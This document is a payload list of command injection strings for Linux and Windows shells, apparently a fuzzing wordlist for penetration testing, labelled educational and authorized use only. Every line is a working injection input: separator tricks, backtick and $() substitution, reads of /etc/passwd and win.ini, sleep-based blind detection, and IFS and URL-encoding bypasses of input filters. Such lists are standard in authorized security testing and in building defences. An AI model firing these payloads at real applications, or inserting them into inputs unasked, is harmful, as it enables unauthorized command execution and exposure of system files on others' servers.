# Command Injection Payloads
# For educational and authorized testing only

# ============================================================================
# LINUX COMMAND SEPARATORS
# ============================================================================
; id
| id
|| id
& id
&& id
`id`
$(id)
; cat /etc/passwd
| cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)
; uname -a
| uname -a
; whoami
| whoami

# ============================================================================
# WINDOWS COMMAND SEPARATORS
# ============================================================================
& whoami
| whoami
&& whoami
& dir
| dir
& type C:\Windows\win.ini
& ipconfig

# ============================================================================
# TIME-BASED DETECTION
# ============================================================================
; sleep 5
| sleep 5
& sleep 5
&& sleep 5
$(sleep 5)
`sleep 5`
; sleep 5 #
| sleep 5 #
& timeout /t 5
| ping -n 5 127.0.0.1
& ping -n 5 127.0.0.1

# ============================================================================
# ENCODING BYPASS
# ============================================================================
;+id
%0aid
%0a%0did
${IFS}id
;${IFS}cat${IFS}/etc/passwd
$IFS'id'

# ============================================================================
# NEWLINE INJECTION
# ============================================================================
%0a id
%0d%0a id

# ============================================================================
# QUOTE BYPASS
# ============================================================================
';id;'
";id;"
`;id;`
